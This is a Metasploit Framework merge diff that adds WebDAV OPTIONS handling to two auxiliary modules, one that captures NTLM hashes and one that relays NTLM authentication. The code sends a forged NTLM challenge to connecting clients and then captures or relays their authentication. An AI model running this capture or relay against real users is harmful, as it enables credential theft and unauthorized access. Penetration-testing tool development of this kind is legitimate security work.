Merge branch 'webdav_fix' of https://github.com/mubix/metasploit-framework into mubix-webdav_fix

modules/auxiliary/server/capture/http_ntlm.rb

@@ -67,23 +67,28 @@ class Metasploit3 < Msf::Auxiliary
 
 	def on_request_uri(cli, request)
 		print_status("Request '#{request.uri}'...")
-
+		
-		# If the host has not started auth, send 401 authenticate with only the NTLM option
+		case request.method
-		if(!request.headers['Authorization'])
+		when 'OPTIONS'
-			response = create_response(401, "Unauthorized")
+			process_options(cli, request)
-			response.headers['WWW-Authenticate'] = "NTLM"
-			cli.send_response(response)
 		else
-			method,hash = request.headers['Authorization'].split(/\s+/,2)
+			# If the host has not started auth, send 401 authenticate with only the NTLM option
-			# If the method isn't NTLM something odd is goign on. Regardless, this won't get what we want, 404 them
+			if(!request.headers['Authorization'])
-			if(method != "NTLM")
+				response = create_response(401, "Unauthorized")
-				print_status("Unrecognized Authorization header, responding with 404")
+				response.headers['WWW-Authenticate'] = "NTLM"
-				send_not_found(cli)
+				cli.send_response(response)
-				return false
+			else
-			end
+				method,hash = request.headers['Authorization'].split(/\s+/,2)
+				# If the method isn't NTLM something odd is goign on. Regardless, this won't get what we want, 404 them
+				if(method != "NTLM")
+					print_status("Unrecognized Authorization header, responding with 404")
+					send_not_found(cli)
+					return false
+				end
 
-			response = handle_auth(cli,hash)
+				response = handle_auth(cli,hash)
-			cli.send_response(response)
+				cli.send_response(response)
+			end
 		end
 	end
 
@@ -96,6 +101,23 @@ class Metasploit3 < Msf::Auxiliary
 		end
 		exploit()
 	end
+	
+	def process_options(cli, request)
+		print_status("OPTIONS #{request.uri}")
+		headers = {
+			'MS-Author-Via' => 'DAV',
+			'DASL'          => '<DAV:sql>',
+			'DAV'           => '1, 2',
+			'Allow'         => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',
+			'Public'        => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK',
+			'Cache-Control' => 'private'
+		}
+		resp = create_response(207, "Multi-Status")
+		headers.each_pair {|k,v| resp[k] = v }
+		resp.body = ""
+		resp['Content-Type'] = 'text/xml'
+		cli.send_response(resp)
+	end
 
 	def handle_auth(cli,hash)
 		#authorization string is base64 encoded message

modules/auxiliary/server/http_ntlmrelay.rb

@@ -93,44 +93,66 @@ class Metasploit3 < Msf::Auxiliary
 
 	# Handles the initial requests waiting for the browser to try NTLM auth
 	def on_request_uri(cli, request)
+	
+		case request.method
+		when 'OPTIONS'
+			process_options(cli, request)
+		else
+			datastore['REQUEST_IP'] = cli.peerhost
+			cli.keepalive = true;
 
-		datastore['REQUEST_IP'] = cli.peerhost
+			# If the host has not started auth, send 401 authenticate with only the NTLM option
-		cli.keepalive = true;
+			if(!request.headers['Authorization'])
+				response = create_response(401, "Unauthorized")
+				response.headers['WWW-Authenticate'] = "NTLM"
+				response.headers['Proxy-Support'] = 'Session-Based-Authentication'
 
-		# If the host has not started auth, send 401 authenticate with only the NTLM option
+				response.body =
-		if(!request.headers['Authorization'])
+					"<HTML><HEAD><TITLE>You are not authorized to view this page</TITLE></HEAD></HTML>"
-			response = create_response(401, "Unauthorized")
-			response.headers['WWW-Authenticate'] = "NTLM"
-			response.headers['Proxy-Support'] = 'Session-Based-Authentication'
 
-			response.body =
+				cli.send_response(response)
-				"<HTML><HEAD><TITLE>You are not authorized to view this page</TITLE></HEAD></HTML>"
+				return false
+			end
+			method,hash = request.headers['Authorization'].split(/\s+/,2)
+			# If the method isn't NTLM something odd is goign on.
+			# Regardless, this won't get what we want, 404 them
+			if(method != "NTLM")
+				print_status("Unrecognized Authorization header, responding with 404")
+				send_not_found(cli)
+				return false
+			end
 
-			cli.send_response(response)
+			print_status("NTLM Request '#{request.uri}' from #{cli.peerhost}:#{cli.peerport}")
-			return false
+
+			if (datastore['SYNCFILE'] != nil)
+				sync_options()
+			end
+
+			handle_relay(cli,hash)
 		end
-		method,hash = request.headers['Authorization'].split(/\s+/,2)
-		# If the method isn't NTLM something odd is goign on.
-		# Regardless, this won't get what we want, 404 them
-		if(method != "NTLM")
-			print_status("Unrecognized Authorization header, responding with 404")
-			send_not_found(cli)
-			return false
-		end
-
-		print_status("NTLM Request '#{request.uri}' from #{cli.peerhost}:#{cli.peerport}")
-
-		if (datastore['SYNCFILE'] != nil)
-			sync_options()
-		end
-
-		handle_relay(cli,hash)
 	end
 
 	def run
 		parse_args()
 		exploit()
 	end
+	
+	def process_options(cli, request)
+		print_status("OPTIONS #{request.uri}")
+		headers = {
+			'MS-Author-Via' => 'DAV',
+			'DASL'          => '<DAV:sql>',
+			'DAV'           => '1, 2',
+			'Allow'         => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',
+			'Public'        => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK',
+			'Cache-Control' => 'private'
+		}
+		resp = create_response(207, "Multi-Status")
+		headers.each_pair {|k,v| resp[k] = v }
+		resp.body = ""
+		resp['Content-Type'] = 'text/xml'
+		cli.send_response(resp)
+	end
 
 	#The call to handle_relay should be a victim HTTP type 1 request
 	def handle_relay(cli_sock, hash)